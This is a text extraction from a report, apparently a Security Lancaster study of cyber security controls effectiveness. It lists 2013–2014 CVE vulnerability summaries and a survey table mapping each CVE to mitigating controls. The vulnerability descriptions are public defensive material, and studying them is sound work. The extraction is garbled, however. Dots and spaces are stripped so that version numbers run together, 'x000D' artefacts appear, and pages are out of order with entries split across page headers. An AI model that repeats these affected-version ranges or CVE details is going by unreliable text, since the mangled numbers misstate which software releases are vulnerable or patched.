CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 26 of 28
Survey Responses
| CVE | SME1 SME2 SME3 SME4 Idealised | No CE | With CE | Controls |
|---|---|---|---|---|
| CVE-2014-4141 | y n y y n | Not Mitigated | Mitigated | Website Blacklisting; Secure Configuration (Secure Browser); Patch Management |
| CVE-2014-4481 | y y y y y | Not Mitigated | Mitigated | Patch Management; Anti-Malware |
| CVE-2014-4617 | y y n n n | Not Mitigated | Mitigated | Firewall; Patch Management |
| CVE-2014-4631 | n n n n n | Not Mitigated | Partially Mitigated | Patch Management; Secure Configuration |
| CVE-2014-6040 | n n n n n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-6105 | n n n n n | Not Mitigated | Mitigated | Firewall; Patch Management |
| CVE-2014-6136 | n n n n n | Not Mitigated | Mitigated | Secure Configuration; Patch Management |
| CVE-2014-6363 | y n y y n | Not Mitigated | Mitigated | Website Blacklisting; Secure Configuration (Secure Browser); Patch Management |
| CVE-2014-6369 | y n y y | Not Mitigated | Mitigated | Website Blacklisting; Secure Configuration (Secure Browser); Patch Management |
| CVE-2014-6378 | n n n n n n | Not Mitigated | Mitigated | Firewall; Patch Management |
| CVE-2014-6487 | n n y n n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-7250 | n y y n n | Not Mitigated | Mitigated | Firewall; Patch Management |
| CVE-2014-7927 | y y y y n | Not Mitigated | Mitigated | Firewall; Secure Configuration (Access Control); Patch Management |
| CVE-2014-7945 | y y y y n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-8447 | y y y y n | Not Mitigated | Partially Mitigated | Anti-Malware; Patch Management |
| CVE-2014-8638 | y y y y y | Not Mitigated | Mitigated | Website Blacklisting; Secure Configuration (Secure Browser); Patch Management |
| CVE-2014-8835 | y y y y y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-9159 | y y y y y | Not Mitigated | Partially Mitigated | Anti-Malware; Patch Management [Time Delay] |
| CVE-2014-9163 | y y y y y | Not Mitigated | Partially Mitigated | Anti-Malware; Patch Management [Time Delay] |
| CVE-2014-9350 | y y y y n | Not Mitigated | Mitigated | Firewall; Anti-DoS; Firmware Updates |
| CVE-2014-9357 | n n n n n | Not Mitigated | Partially Mitigated | Patch Management; Anti-Malware; Secure Configuration |
CVE Details

CVE-2013-0008
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".
CVE-2013-0022
Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".
CVE-2013-0084
Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".
CVE-2013-0140
SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.
CVE-2013-0149
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.
CVE-2013-0172
Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.
CVE-2013-0174
The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.
CVE-2013-0199
The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.
CVE-2013-0253
The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
CVE-2013-0270
OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.
CVE-2013-0481
The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.
CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.
CVE-2013-0619
Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.
CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.
CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.
CVE-2013-0746
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.
CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.
CVE-2013-0909
The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.
CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.
CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153
Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303
Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384
Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734
Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11, 4.1.x and 4.2.x before 4.2.7, and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777
The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319
FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340
Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492
Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507
Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736
Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780
Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803
ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824
Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826
WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116
Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137
Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280
EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632
The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656
Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856
Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860
Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893
Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.
CVE-2013-3897
Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900
The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905
Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223
The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436
The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478
Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529
Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555
Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776
NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.
CVE-2013-4782
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057
hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".
CVE-2013-5369
IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428
IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431
Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507
The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536
Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559
Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561
The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757
Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167
Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284
Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".
CVE-2013-6396
The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475
Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660
The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699
The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035
